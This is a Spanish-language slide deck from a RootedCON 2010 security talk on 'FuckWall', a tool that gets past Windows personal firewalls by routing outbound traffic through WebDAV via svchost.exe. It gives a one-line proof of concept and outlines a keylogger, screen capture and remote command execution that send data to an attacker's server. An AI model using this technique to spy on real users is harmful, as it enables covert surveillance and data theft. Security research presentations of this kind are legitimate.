SlideShare una empresa de Scribd logo
FuckWall

               A Windows Firewalls Bypassing Tool 




Congreso de Seguridad ~ Rooted CON’2010
¿Quiénes no sómos?

   Investigadores buscando fallos en el protocolo DNS




Congreso de Seguridad ~ Rooted CON’2010                 2
¿Quiénes no sómos?

         Hackers que vieron la luz al final del tunel y
         encontraron vida más allá de las consultoras...




Congreso de Seguridad ~ Rooted CON’2010                    3
¿Quiénes no sómos?

                                Cálico Electrónico




Congreso de Seguridad ~ Rooted CON’2010              4
¿Quiénes podríamos ser?


  M&M’s HackStory: Kernelpanik o Kpk fue un grupo
   de hackers nacido aproximadamente en el año 2000,
    según se desprende de la fecha de copyright de su
                    web, aún activa.

  Las últimas noticias de Kernelpanik son de 2007, año
             en que se supone dejó de existir.



Congreso de Seguridad ~ Rooted CON’2010                  5
¿De qué vamos a hablar?

-  Orígenes

-  La idea aka. “El concepto es el concepto”

-  PoC aka. “¿Esto realmente funciona?”

-  FuckWall aka. “La herramienta”

-  Demostración FuckWall aka. “Pa’habernos matao”

Congreso de Seguridad ~ Rooted CON’2010             6
FuckWall: Los orígenes (I)

•  Once upon a time ...

     –  Éramos jóvenes, cometíamos errores y programábamos
        por dinero ...

     –  Pero aprendimos de nuestros errores ...

          Win32/Bypass: Anulando la detección de ficheros ( 2007 )

               – Centrado en el bypassing de antivirus
               – Rudimentario técnicamente pero “ocurrente”

Congreso de Seguridad ~ Rooted CON’2010                              7
FuckWall: Los orígenes (II)

•  El presente:

     – Agosto de 2009: ¿Por qué no hacer lo mismo con
       los firewalls?

     – FuckWall: A Windows firewalls bypassing tool

               – Centrado en la evasión de los firewalls  Enviar tráfico de
                 SALIDA sin control por parte del FW personal.
               – Apoyado en una debilidad de diseño
               – Desarrollo de una herramienta automatizada

Congreso de Seguridad ~ Rooted CON’2010                                        8
FuckWall: Fundamento funcional

•  Usabilidad vs. Seguridad

•  Procesos “privilegiados” en firewalls

     –  Por razones de “usabilidad”/”funcionalidad” numerosas compañías
        firewalls deciden “arbitrariamente” permitir libremente la comunicación
        de tráfico de salida a determinados procesos.




Congreso de Seguridad ~ Rooted CON’2010                                           9
FuckWall: Fundamento funcional

•  OutPost:




Congreso de Seguridad ~ Rooted CON’2010   1
                                          0
FuckWall: Fundamento funcional

•  Zone Alarm:




Congreso de Seguridad ~ Rooted CON’2010   1
                                          1
FuckWall: Fundamento funcional




       Y así hasta 8 firewalls personales más ...

     Se libró ( si la memoria no nos falla ): Jetico



Congreso de Seguridad ~ Rooted CON’2010                1
                                                       2
FuckWall: La idea

•  Una vieja idea:
     – ¿Qué sucedería si desde el espacio de usuario
       pudiesemos controlar uno de esos procesos
       “privilegiados” por los firewalls?


•  Se ha realizado anteriormente:
     – Hooking a una aplicación “privilegiada”
     – Más usual: hooking del navegador

          www.securitybydefault.com/2009/09/troyanos-titiriteros.html

Congreso de Seguridad ~ Rooted CON’2010                                 1
                                                                        3
FuckWall: Revisando la idea

•  Los problemas del hooking:
     – Técnica “relativamente” difundida e invasiva.
     – Los antivirus y los firewalls detectan intentos de
       hooking sobre aplicaciones, alertando al usuario
       de contenido vírico y/o peligroso.


•  La idea revisada:
     – ¿Y si fuese posible desde el espacio de usuario
       interactuar directamente con un proceso
       privilegiado sin usar hooking?
Congreso de Seguridad ~ Rooted CON’2010                     1
                                                            4
FuckWall: Construyendo la idea (I)

•  El proceso SVCHOST.EXE

     – ¿Qué es el proceso SVCHOST.EXE?

        A grosso modo es la “idea” de Microsoft para
        ejecutar cualquier servicio que esté contenido en
        un DLL




Congreso de Seguridad ~ Rooted CON’2010                     1
                                                            5
FuckWall: Construyendo la idea (I)

•  El proceso SVCHOST.EXE

     – ¿Para qué se usa SVCHOST.EXE?

          •  DNS
          •  uPNP
          •  Tráfico ICMP
          •  Web Folders
          •  Y un largo etc ...


Congreso de Seguridad ~ Rooted CON’2010   1
                                          6
FuckWall: Construyendo la idea (II)

•  La gran pregunta:

    ¿Es posible manipular svchost.exe
desde espacio de usuario y sin necesidad de
ningún tipo de privilegio especial generando
          tráfico de salida dirigido?




Congreso de Seguridad ~ Rooted CON’2010    1
                                           7
FuckWall: Construyendo la idea (III)

- A nosotros se nos ocurre:

    La tecnología de Microsoft Windows denominada
    “carpetas web” / “web folders” hace uso de
    svchost.exe para su comunicación

                    » No requiere privilegios

                    » Permite comunicación WebDAV



Congreso de Seguridad ~ Rooted CON’2010             1
                                                    8
FuckWALL: Proof of Concept
•  ¿Qué hace falta para evadir el control de tráfico
   saliente en aproximadamente el 90% de los
   firewalls personales de windows?


     –  Un servidor Apache con el módulo de WebDAV
       habilitado para compartir un recurso.

     –  Escribir desde el equipo del que queramos
       bypassear su firewal:

                       net use Z: http://servidordav/recurso
Congreso de Seguridad ~ Rooted CON’2010                        1
                                                               9
FuckWALL: Proof of Concept (II)




                              DEMOSTRACIÓN I

                                          PoC




Congreso de Seguridad ~ Rooted CON’2010         2
                                                0
FuckWALL: La Herramienta (I)

•  FuckWall es una herramienta cliente-servidor
   que se apoya en el concepto anteriormente
   mostrado de hacer uso de la comunicación
   WebDAV, implementada a través del proceso
   svchost.exe, para evadir las medidas de
   seguridad sobre el tráfico saliente impuestas
   por firewalls personales en entornos Microsoft
   Windows.


Congreso de Seguridad ~ Rooted CON’2010         2
                                                1
FuckWALL: La Herramienta (II)

•  Funcionalidades:

          •  Captura de Teclado: Comunicación unidireccional hacia el
             servidor de las teclas pulsadas en la máquina cliente (víctima)

          •  Control Remoto:

               – Captura de pantalla: Comunicación bidireccional para envío al
                 servidor de la pantalla capturada ante cada click del ratón en el
                 equipo cliente (victima)

               – Ejecución de comandos: Comunicación bidireccional para la
                 ejecución de comandos en la máquina cliente (víctima) y envío
                 de resultados al servidor.
Congreso de Seguridad ~ Rooted CON’2010                                          2
                                                                                 2
FuckWALL: Función Keylogger

•  Cada pulsación de tecla genera en el cliente
   un intento por montar un recurso compartido
   equivalente a la tecla pulsada.

•  El servidor rechaza _siempre_ este intento de
   montaje, registrando la pulsación y la
   aplicación en la que se ha ejecutado.



Congreso de Seguridad ~ Rooted CON’2010        2
                                               3
FuckWALL: Función Keylogger

•  Cliente:
     –  Paso 1: SetWindowHookEx  Tecla pulsada.

     –  Paso 2: WNetAddConnection2  tecla.app.kpk


•  Servidor (mod_rewrite):
     –  Paso 3: Rewriterule ^(.*).(.*).kpk$ logger.php?app=
        $1&key=$2  Registro

     –  Paso 4: header('HTTP/1.1 404 Not Found');  Error

Congreso de Seguridad ~ Rooted CON’2010                     2
                                                            4
FuckWALL: Proof of Concept (II)



                           DEMOSTRACIÓN II

                                FuckWall
                            Captura de Teclado




Congreso de Seguridad ~ Rooted CON’2010          2
                                                 5
FuckWALL: Función Control Remoto

•  El cliente se conecta satisfactoriamente al recurso compartido
   por el servidor.

•  El servidor para esta funcionalidad hace uso del módulo
   mod_dav.

•  El cliente hará envíos de las capturas de pantalla ante cada
   click del usuario.

•  El cliente se descarga del servidor la lista de comandos a
   ejecutar, los ejecuta y devuelve el resultado.


Congreso de Seguridad ~ Rooted CON’2010                         2
                                                                6
FuckWALL: Función Control Remoto

•  Paso 1: WNetAddConnection2  Recurso Netbios
   SIN Unidad*

•  Paso 2: SetWindowHookEx  Captura de Pantalla


•  Paso 3: CreateFile  Copiar datos al Servidor




Congreso de Seguridad ~ Rooted CON’2010            2
                                                   7
FuckWALL: Proof of Concept (II)



                           DEMOSTRACIÓN III

                                  FuckWall
                                Control Remoto




Congreso de Seguridad ~ Rooted CON’2010          2
                                                 8
FuckWALL: Conclusiones

•  Fácil evasión del firewall

•  Minimos requerimientos técnicos

•  Llamadas básicas al API

•  Debilidad basada en la confianza en
   determinados procesos vitales del sistema.

Congreso de Seguridad ~ Rooted CON’2010     2
                                            9
¡GRACIAS POR AGUANTAR EN LA SILLA!




     Autores ( en escricto orden de nacimiento ):

               Antonio López – alopmun@gmail.com

          Javier Medina – medina.fjavier@gmail.com
Congreso de Seguridad ~ Rooted CON’2010

Más contenido relacionado

La actualidad más candente

Kali linux
Kali linuxKali linux
Kali linux
andresaguilar06
 
Kali linux guia español
Kali linux guia españolKali linux guia español
Kali linux guia español
Homero de la Barra
 
Lorenzo Martínez - Linux DFIR: My Way! [rooted2019]
Lorenzo Martínez - Linux DFIR: My Way! [rooted2019]Lorenzo Martínez - Linux DFIR: My Way! [rooted2019]
Lorenzo Martínez - Linux DFIR: My Way! [rooted2019]
RootedCON
 
Docker para integradores Asterisk
Docker para integradores AsteriskDocker para integradores Asterisk
Docker para integradores Asterisk
OpenDireito
 
Taller instalacion Kali Linux
Taller instalacion Kali LinuxTaller instalacion Kali Linux
Taller instalacion Kali Linux
Marlon Altamirano
 
Seguridad en Windows Mobile
Seguridad en Windows MobileSeguridad en Windows Mobile
Seguridad en Windows Mobile
Conferencias FIST
 
Seguridad so pi_2011
Seguridad so pi_2011Seguridad so pi_2011
Seguridad so pi_2011
Jacobo Avariento
 
Presentacion kali linux
Presentacion kali linuxPresentacion kali linux
Presentacion kali linux
Kevin Medina
 
Virus
VirusVirus
seguridadinformática
seguridadinformáticaseguridadinformática
seguridadinformática
silviafdezelespi
 
Estrategias de Ataque y Defensa
Estrategias de Ataque y DefensaEstrategias de Ataque y Defensa
Javier Marcos - Detección de amenazas a escala con osquery [rooted2019]
Javier Marcos - Detección de amenazas a escala con osquery [rooted2019]Javier Marcos - Detección de amenazas a escala con osquery [rooted2019]
Javier Marcos - Detección de amenazas a escala con osquery [rooted2019]
RootedCON
 
Virus
VirusVirus
Fedora Security LAB
Fedora Security LABFedora Security LAB
Fedora Security LAB
Baruch Ramos
 

La actualidad más candente (14)

Kali linux
Kali linuxKali linux
Kali linux
 
Kali linux guia español
Kali linux guia españolKali linux guia español
Kali linux guia español
 
Lorenzo Martínez - Linux DFIR: My Way! [rooted2019]
Lorenzo Martínez - Linux DFIR: My Way! [rooted2019]Lorenzo Martínez - Linux DFIR: My Way! [rooted2019]
Lorenzo Martínez - Linux DFIR: My Way! [rooted2019]
 
Docker para integradores Asterisk
Docker para integradores AsteriskDocker para integradores Asterisk
Docker para integradores Asterisk
 
Taller instalacion Kali Linux
Taller instalacion Kali LinuxTaller instalacion Kali Linux
Taller instalacion Kali Linux
 
Seguridad en Windows Mobile
Seguridad en Windows MobileSeguridad en Windows Mobile
Seguridad en Windows Mobile
 
Seguridad so pi_2011
Seguridad so pi_2011Seguridad so pi_2011
Seguridad so pi_2011
 
Presentacion kali linux
Presentacion kali linuxPresentacion kali linux
Presentacion kali linux
 
Virus
VirusVirus
Virus
 
seguridadinformática
seguridadinformáticaseguridadinformática
seguridadinformática
 
Estrategias de Ataque y Defensa
Estrategias de Ataque y DefensaEstrategias de Ataque y Defensa
Estrategias de Ataque y Defensa
 
Javier Marcos - Detección de amenazas a escala con osquery [rooted2019]
Javier Marcos - Detección de amenazas a escala con osquery [rooted2019]Javier Marcos - Detección de amenazas a escala con osquery [rooted2019]
Javier Marcos - Detección de amenazas a escala con osquery [rooted2019]
 
Virus
VirusVirus
Virus
 
Fedora Security LAB
Fedora Security LABFedora Security LAB
Fedora Security LAB
 

Destacado

El legado economico de allende
El legado economico de allendeEl legado economico de allende
El legado economico de allende
WALTERIO BARRA C / COMPETENZZA CONSULTORES
 
CICLOS
CICLOSCICLOS
CICLOS
lirulli
 
Ler e escrever na web 2.0 (ii)
Ler e escrever na web 2.0 (ii)Ler e escrever na web 2.0 (ii)
Ler e escrever na web 2.0 (ii)
Ádila Faria
 
Relatório " A Cidade constitucional: Capital da República IX"
Relatório " A Cidade constitucional: Capital da República IX" Relatório " A Cidade constitucional: Capital da República IX"
Relatório " A Cidade constitucional: Capital da República IX"
nandasouzabib
 
Guadalupe Lopez Hernandez Vid
Guadalupe Lopez Hernandez VidGuadalupe Lopez Hernandez Vid
Guadalupe Lopez Hernandez Vid
Richard Lastra
 
Pacto De Comvivencia
Pacto De ComvivenciaPacto De Comvivencia
Pacto De Comvivencia
guest6127c7
 
Diapositiva de titulo
Diapositiva de tituloDiapositiva de titulo
Diapositiva de titulo
nicords
 

Destacado (7)

El legado economico de allende
El legado economico de allendeEl legado economico de allende
El legado economico de allende
 
CICLOS
CICLOSCICLOS
CICLOS
 
Ler e escrever na web 2.0 (ii)
Ler e escrever na web 2.0 (ii)Ler e escrever na web 2.0 (ii)
Ler e escrever na web 2.0 (ii)
 
Relatório " A Cidade constitucional: Capital da República IX"
Relatório " A Cidade constitucional: Capital da República IX" Relatório " A Cidade constitucional: Capital da República IX"
Relatório " A Cidade constitucional: Capital da República IX"
 
Guadalupe Lopez Hernandez Vid
Guadalupe Lopez Hernandez VidGuadalupe Lopez Hernandez Vid
Guadalupe Lopez Hernandez Vid
 
Pacto De Comvivencia
Pacto De ComvivenciaPacto De Comvivencia
Pacto De Comvivencia
 
Diapositiva de titulo
Diapositiva de tituloDiapositiva de titulo
Diapositiva de titulo
 

Similar a Antonio López & Javier Medina - FuckWALL - Bypassing firewalls [RootedCON 2010]

Curso linux clase_2_2012
Curso linux clase_2_2012Curso linux clase_2_2012
Curso linux clase_2_2012
Dario Villafañe
 
David López Paz - Global Warfare [RootedCON 2011]
David López Paz - Global Warfare [RootedCON 2011]David López Paz - Global Warfare [RootedCON 2011]
David López Paz - Global Warfare [RootedCON 2011]
RootedCON
 
VC4NM73 EQ#4-W8,U5,T4
VC4NM73 EQ#4-W8,U5,T4VC4NM73 EQ#4-W8,U5,T4
VC4NM73 EQ#4-W8,U5,T4
luigiHdz
 
Vc4 nm73 eq#4-w8,u5,t4
Vc4 nm73 eq#4-w8,u5,t4Vc4 nm73 eq#4-w8,u5,t4
Vc4 nm73 eq#4-w8,u5,t4
17oswaldo
 
Wi Fi Slax 3.1 Fist Conference
Wi Fi Slax 3.1 Fist ConferenceWi Fi Slax 3.1 Fist Conference
Wi Fi Slax 3.1 Fist Conference
PC COMPUTER
 
Seguridad informatica
Seguridad informaticaSeguridad informatica
Seguridad informatica
walteraguero
 
CodeSeeker: Un firewall de Nivel 7 OpenSource. No Con Name 2003
CodeSeeker: Un firewall de Nivel 7 OpenSource. No Con Name 2003CodeSeeker: Un firewall de Nivel 7 OpenSource. No Con Name 2003
CodeSeeker: Un firewall de Nivel 7 OpenSource. No Con Name 2003
Internet Security Auditors
 
Kali Linux
Kali LinuxKali Linux
Ataques de denegacion de servicio
Ataques de denegacion de servicioAtaques de denegacion de servicio
Ataques de denegacion de servicio
Camilo Fernandez
 
Propietario
PropietarioPropietario
Propietario
IsraelIvanGarcaLpez
 
Present3
Present3Present3
tehnik mobile hacking
tehnik mobile hackingtehnik mobile hacking
tehnik mobile hacking
bayuwidiatmoko
 
Seguridad inalámbrica
Seguridad inalámbricaSeguridad inalámbrica
Seguridad inalámbrica
tena10
 
Laboratorio de Maquinas Virtuales
Laboratorio de Maquinas VirtualesLaboratorio de Maquinas Virtuales
Laboratorio de Maquinas Virtuales
Eduardo Fernández
 
Hacking withinnails pdfcompleto
Hacking withinnails pdfcompletoHacking withinnails pdfcompleto
Jornada de ciberdefensa stuxnet
Jornada de ciberdefensa   stuxnetJornada de ciberdefensa   stuxnet
Jornada de ciberdefensa stuxnet
Alejandro Ramos
 
Wifislax 3.1
Wifislax 3.1Wifislax 3.1
Wifislax 3.1
Conferencias FIST
 
Wifislax 3.1
Wifislax 3.1Wifislax 3.1
Wifislax 3.1
Conferencias FIST
 
Presentacion de la practica berdin 1500060000
Presentacion de la practica berdin 1500060000Presentacion de la practica berdin 1500060000
Presentacion de la practica berdin 1500060000
geovanniurielgonzale
 
Presentación de la practica -1. Verdin
Presentación de la practica -1. VerdinPresentación de la practica -1. Verdin
Presentación de la practica -1. Verdin
geovanniurielgonzale
 

Similar a Antonio López & Javier Medina - FuckWALL - Bypassing firewalls [RootedCON 2010] (20)

Curso linux clase_2_2012
Curso linux clase_2_2012Curso linux clase_2_2012
Curso linux clase_2_2012
 
David López Paz - Global Warfare [RootedCON 2011]
David López Paz - Global Warfare [RootedCON 2011]David López Paz - Global Warfare [RootedCON 2011]
David López Paz - Global Warfare [RootedCON 2011]
 
VC4NM73 EQ#4-W8,U5,T4
VC4NM73 EQ#4-W8,U5,T4VC4NM73 EQ#4-W8,U5,T4
VC4NM73 EQ#4-W8,U5,T4
 
Vc4 nm73 eq#4-w8,u5,t4
Vc4 nm73 eq#4-w8,u5,t4Vc4 nm73 eq#4-w8,u5,t4
Vc4 nm73 eq#4-w8,u5,t4
 
Wi Fi Slax 3.1 Fist Conference
Wi Fi Slax 3.1 Fist ConferenceWi Fi Slax 3.1 Fist Conference
Wi Fi Slax 3.1 Fist Conference
 
Seguridad informatica
Seguridad informaticaSeguridad informatica
Seguridad informatica
 
CodeSeeker: Un firewall de Nivel 7 OpenSource. No Con Name 2003
CodeSeeker: Un firewall de Nivel 7 OpenSource. No Con Name 2003CodeSeeker: Un firewall de Nivel 7 OpenSource. No Con Name 2003
CodeSeeker: Un firewall de Nivel 7 OpenSource. No Con Name 2003
 
Kali Linux
Kali LinuxKali Linux
Kali Linux
 
Ataques de denegacion de servicio
Ataques de denegacion de servicioAtaques de denegacion de servicio
Ataques de denegacion de servicio
 
Propietario
PropietarioPropietario
Propietario
 
Present3
Present3Present3
Present3
 
tehnik mobile hacking
tehnik mobile hackingtehnik mobile hacking
tehnik mobile hacking
 
Seguridad inalámbrica
Seguridad inalámbricaSeguridad inalámbrica
Seguridad inalámbrica
 
Laboratorio de Maquinas Virtuales
Laboratorio de Maquinas VirtualesLaboratorio de Maquinas Virtuales
Laboratorio de Maquinas Virtuales
 
Hacking withinnails pdfcompleto
Hacking withinnails pdfcompletoHacking withinnails pdfcompleto
Hacking withinnails pdfcompleto
 
Jornada de ciberdefensa stuxnet
Jornada de ciberdefensa   stuxnetJornada de ciberdefensa   stuxnet
Jornada de ciberdefensa stuxnet
 
Wifislax 3.1
Wifislax 3.1Wifislax 3.1
Wifislax 3.1
 
Wifislax 3.1
Wifislax 3.1Wifislax 3.1
Wifislax 3.1
 
Presentacion de la practica berdin 1500060000
Presentacion de la practica berdin 1500060000Presentacion de la practica berdin 1500060000
Presentacion de la practica berdin 1500060000
 
Presentación de la practica -1. Verdin
Presentación de la practica -1. VerdinPresentación de la practica -1. Verdin
Presentación de la practica -1. Verdin
 

Más de RootedCON

Rooted2020 A clockwork pentester - Jose Carlos Moral & Alvaro Villaverde
Rooted2020 A clockwork pentester - Jose Carlos Moral & Alvaro VillaverdeRooted2020 A clockwork pentester - Jose Carlos Moral & Alvaro Villaverde
Rooted2020 A clockwork pentester - Jose Carlos Moral & Alvaro Villaverde
RootedCON
 
rooted2020 Sandbox fingerprinting -_evadiendo_entornos_de_analisis_-_victor_c...
rooted2020 Sandbox fingerprinting -_evadiendo_entornos_de_analisis_-_victor_c...rooted2020 Sandbox fingerprinting -_evadiendo_entornos_de_analisis_-_victor_c...
rooted2020 Sandbox fingerprinting -_evadiendo_entornos_de_analisis_-_victor_c...
RootedCON
 
Rooted2020 hunting malware-using_process_behavior-roberto_amado
Rooted2020 hunting malware-using_process_behavior-roberto_amadoRooted2020 hunting malware-using_process_behavior-roberto_amado
Rooted2020 hunting malware-using_process_behavior-roberto_amado
RootedCON
 
Rooted2020 compliance as-code_-_guillermo_obispo_-_jose_mariaperez_-_
Rooted2020 compliance as-code_-_guillermo_obispo_-_jose_mariaperez_-_Rooted2020 compliance as-code_-_guillermo_obispo_-_jose_mariaperez_-_
Rooted2020 compliance as-code_-_guillermo_obispo_-_jose_mariaperez_-_
RootedCON
 
Rooted2020 the day i_ruled_the_world_deceiving_software_developers_through_op...
Rooted2020 the day i_ruled_the_world_deceiving_software_developers_through_op...Rooted2020 the day i_ruled_the_world_deceiving_software_developers_through_op...
Rooted2020 the day i_ruled_the_world_deceiving_software_developers_through_op...
RootedCON
 
Rooted2020 si la-empresa_ha_ocultado_el_ciberataque,_como_se_ha_enterado_el_r...
Rooted2020 si la-empresa_ha_ocultado_el_ciberataque,_como_se_ha_enterado_el_r...Rooted2020 si la-empresa_ha_ocultado_el_ciberataque,_como_se_ha_enterado_el_r...
Rooted2020 si la-empresa_ha_ocultado_el_ciberataque,_como_se_ha_enterado_el_r...
RootedCON
 
Rooted2020 wordpress-another_terror_story_-_manuel_garcia_-_jacinto_sergio_ca...
Rooted2020 wordpress-another_terror_story_-_manuel_garcia_-_jacinto_sergio_ca...Rooted2020 wordpress-another_terror_story_-_manuel_garcia_-_jacinto_sergio_ca...
Rooted2020 wordpress-another_terror_story_-_manuel_garcia_-_jacinto_sergio_ca...
RootedCON
 
Rooted2020 Atacando comunicaciones-de_voz_cifradas_-_jose_luis_verdeguer
Rooted2020 Atacando comunicaciones-de_voz_cifradas_-_jose_luis_verdeguerRooted2020 Atacando comunicaciones-de_voz_cifradas_-_jose_luis_verdeguer
Rooted2020 Atacando comunicaciones-de_voz_cifradas_-_jose_luis_verdeguer
RootedCON
 
rooted2020-Rootkit necurs no_es_un_bug,_es_una_feature_-_roberto_santos_-_jav...
rooted2020-Rootkit necurs no_es_un_bug,_es_una_feature_-_roberto_santos_-_jav...rooted2020-Rootkit necurs no_es_un_bug,_es_una_feature_-_roberto_santos_-_jav...
rooted2020-Rootkit necurs no_es_un_bug,_es_una_feature_-_roberto_santos_-_jav...
RootedCON
 
Rooted2020 stefano maccaglia--_the_enemy_of_my_enemy
Rooted2020 stefano maccaglia--_the_enemy_of_my_enemyRooted2020 stefano maccaglia--_the_enemy_of_my_enemy
Rooted2020 stefano maccaglia--_the_enemy_of_my_enemy
RootedCON
 
Rooted2020 taller de-reversing_de_binarios_escritos_en_golang_-_mariano_palom...
Rooted2020 taller de-reversing_de_binarios_escritos_en_golang_-_mariano_palom...Rooted2020 taller de-reversing_de_binarios_escritos_en_golang_-_mariano_palom...
Rooted2020 taller de-reversing_de_binarios_escritos_en_golang_-_mariano_palom...
RootedCON
 
Rooted2020 virtual pwned-network_-_manel_molina
Rooted2020 virtual pwned-network_-_manel_molinaRooted2020 virtual pwned-network_-_manel_molina
Rooted2020 virtual pwned-network_-_manel_molina
RootedCON
 
Rooted2020 van a-mear_sangre_como_hacer_que_los_malos_lo_paguen_muy_caro_-_an...
Rooted2020 van a-mear_sangre_como_hacer_que_los_malos_lo_paguen_muy_caro_-_an...Rooted2020 van a-mear_sangre_como_hacer_que_los_malos_lo_paguen_muy_caro_-_an...
Rooted2020 van a-mear_sangre_como_hacer_que_los_malos_lo_paguen_muy_caro_-_an...
RootedCON
 
Rooted2020 todo a-siem_-_marta_lopez
Rooted2020 todo a-siem_-_marta_lopezRooted2020 todo a-siem_-_marta_lopez
Rooted2020 todo a-siem_-_marta_lopez
RootedCON
 
Rooted2020 roapt evil-mass_storage_-_tu-ya_aqui_-_david_reguera_-_abel_valero
Rooted2020 roapt evil-mass_storage_-_tu-ya_aqui_-_david_reguera_-_abel_valeroRooted2020 roapt evil-mass_storage_-_tu-ya_aqui_-_david_reguera_-_abel_valero
Rooted2020 roapt evil-mass_storage_-_tu-ya_aqui_-_david_reguera_-_abel_valero
RootedCON
 
Rooted2020 live coding--_jesus_jara
Rooted2020 live coding--_jesus_jaraRooted2020 live coding--_jesus_jara
Rooted2020 live coding--_jesus_jara
RootedCON
 
Rooted2020 legalidad de-la_prueba_tecnologica_indiciaria_cuando_tu_papi_es_un...
Rooted2020 legalidad de-la_prueba_tecnologica_indiciaria_cuando_tu_papi_es_un...Rooted2020 legalidad de-la_prueba_tecnologica_indiciaria_cuando_tu_papi_es_un...
Rooted2020 legalidad de-la_prueba_tecnologica_indiciaria_cuando_tu_papi_es_un...
RootedCON
 
Rooted2020 hackeando el-mundo_exterior_a_traves_de_bluetooth_low-energy_ble_-...
Rooted2020 hackeando el-mundo_exterior_a_traves_de_bluetooth_low-energy_ble_-...Rooted2020 hackeando el-mundo_exterior_a_traves_de_bluetooth_low-energy_ble_-...
Rooted2020 hackeando el-mundo_exterior_a_traves_de_bluetooth_low-energy_ble_-...
RootedCON
 
Rooted2020 evading deep-learning_malware_detectors_-_javier_yuste
Rooted2020 evading deep-learning_malware_detectors_-_javier_yusteRooted2020 evading deep-learning_malware_detectors_-_javier_yuste
Rooted2020 evading deep-learning_malware_detectors_-_javier_yuste
RootedCON
 
Rooted2020 encontrando 0days-en_2020_-_antonio_morales
Rooted2020 encontrando 0days-en_2020_-_antonio_moralesRooted2020 encontrando 0days-en_2020_-_antonio_morales
Rooted2020 encontrando 0days-en_2020_-_antonio_morales
RootedCON
 

Más de RootedCON (20)

Rooted2020 A clockwork pentester - Jose Carlos Moral & Alvaro Villaverde
Rooted2020 A clockwork pentester - Jose Carlos Moral & Alvaro VillaverdeRooted2020 A clockwork pentester - Jose Carlos Moral & Alvaro Villaverde
Rooted2020 A clockwork pentester - Jose Carlos Moral & Alvaro Villaverde
 
rooted2020 Sandbox fingerprinting -_evadiendo_entornos_de_analisis_-_victor_c...
rooted2020 Sandbox fingerprinting -_evadiendo_entornos_de_analisis_-_victor_c...rooted2020 Sandbox fingerprinting -_evadiendo_entornos_de_analisis_-_victor_c...
rooted2020 Sandbox fingerprinting -_evadiendo_entornos_de_analisis_-_victor_c...
 
Rooted2020 hunting malware-using_process_behavior-roberto_amado
Rooted2020 hunting malware-using_process_behavior-roberto_amadoRooted2020 hunting malware-using_process_behavior-roberto_amado
Rooted2020 hunting malware-using_process_behavior-roberto_amado
 
Rooted2020 compliance as-code_-_guillermo_obispo_-_jose_mariaperez_-_
Rooted2020 compliance as-code_-_guillermo_obispo_-_jose_mariaperez_-_Rooted2020 compliance as-code_-_guillermo_obispo_-_jose_mariaperez_-_
Rooted2020 compliance as-code_-_guillermo_obispo_-_jose_mariaperez_-_
 
Rooted2020 the day i_ruled_the_world_deceiving_software_developers_through_op...
Rooted2020 the day i_ruled_the_world_deceiving_software_developers_through_op...Rooted2020 the day i_ruled_the_world_deceiving_software_developers_through_op...
Rooted2020 the day i_ruled_the_world_deceiving_software_developers_through_op...
 
Rooted2020 si la-empresa_ha_ocultado_el_ciberataque,_como_se_ha_enterado_el_r...
Rooted2020 si la-empresa_ha_ocultado_el_ciberataque,_como_se_ha_enterado_el_r...Rooted2020 si la-empresa_ha_ocultado_el_ciberataque,_como_se_ha_enterado_el_r...
Rooted2020 si la-empresa_ha_ocultado_el_ciberataque,_como_se_ha_enterado_el_r...
 
Rooted2020 wordpress-another_terror_story_-_manuel_garcia_-_jacinto_sergio_ca...
Rooted2020 wordpress-another_terror_story_-_manuel_garcia_-_jacinto_sergio_ca...Rooted2020 wordpress-another_terror_story_-_manuel_garcia_-_jacinto_sergio_ca...
Rooted2020 wordpress-another_terror_story_-_manuel_garcia_-_jacinto_sergio_ca...
 
Rooted2020 Atacando comunicaciones-de_voz_cifradas_-_jose_luis_verdeguer
Rooted2020 Atacando comunicaciones-de_voz_cifradas_-_jose_luis_verdeguerRooted2020 Atacando comunicaciones-de_voz_cifradas_-_jose_luis_verdeguer
Rooted2020 Atacando comunicaciones-de_voz_cifradas_-_jose_luis_verdeguer
 
rooted2020-Rootkit necurs no_es_un_bug,_es_una_feature_-_roberto_santos_-_jav...
rooted2020-Rootkit necurs no_es_un_bug,_es_una_feature_-_roberto_santos_-_jav...rooted2020-Rootkit necurs no_es_un_bug,_es_una_feature_-_roberto_santos_-_jav...
rooted2020-Rootkit necurs no_es_un_bug,_es_una_feature_-_roberto_santos_-_jav...
 
Rooted2020 stefano maccaglia--_the_enemy_of_my_enemy
Rooted2020 stefano maccaglia--_the_enemy_of_my_enemyRooted2020 stefano maccaglia--_the_enemy_of_my_enemy
Rooted2020 stefano maccaglia--_the_enemy_of_my_enemy
 
Rooted2020 taller de-reversing_de_binarios_escritos_en_golang_-_mariano_palom...
Rooted2020 taller de-reversing_de_binarios_escritos_en_golang_-_mariano_palom...Rooted2020 taller de-reversing_de_binarios_escritos_en_golang_-_mariano_palom...
Rooted2020 taller de-reversing_de_binarios_escritos_en_golang_-_mariano_palom...
 
Rooted2020 virtual pwned-network_-_manel_molina
Rooted2020 virtual pwned-network_-_manel_molinaRooted2020 virtual pwned-network_-_manel_molina
Rooted2020 virtual pwned-network_-_manel_molina
 
Rooted2020 van a-mear_sangre_como_hacer_que_los_malos_lo_paguen_muy_caro_-_an...
Rooted2020 van a-mear_sangre_como_hacer_que_los_malos_lo_paguen_muy_caro_-_an...Rooted2020 van a-mear_sangre_como_hacer_que_los_malos_lo_paguen_muy_caro_-_an...
Rooted2020 van a-mear_sangre_como_hacer_que_los_malos_lo_paguen_muy_caro_-_an...
 
Rooted2020 todo a-siem_-_marta_lopez
Rooted2020 todo a-siem_-_marta_lopezRooted2020 todo a-siem_-_marta_lopez
Rooted2020 todo a-siem_-_marta_lopez
 
Rooted2020 roapt evil-mass_storage_-_tu-ya_aqui_-_david_reguera_-_abel_valero
Rooted2020 roapt evil-mass_storage_-_tu-ya_aqui_-_david_reguera_-_abel_valeroRooted2020 roapt evil-mass_storage_-_tu-ya_aqui_-_david_reguera_-_abel_valero
Rooted2020 roapt evil-mass_storage_-_tu-ya_aqui_-_david_reguera_-_abel_valero
 
Rooted2020 live coding--_jesus_jara
Rooted2020 live coding--_jesus_jaraRooted2020 live coding--_jesus_jara
Rooted2020 live coding--_jesus_jara
 
Rooted2020 legalidad de-la_prueba_tecnologica_indiciaria_cuando_tu_papi_es_un...
Rooted2020 legalidad de-la_prueba_tecnologica_indiciaria_cuando_tu_papi_es_un...Rooted2020 legalidad de-la_prueba_tecnologica_indiciaria_cuando_tu_papi_es_un...
Rooted2020 legalidad de-la_prueba_tecnologica_indiciaria_cuando_tu_papi_es_un...
 
Rooted2020 hackeando el-mundo_exterior_a_traves_de_bluetooth_low-energy_ble_-...
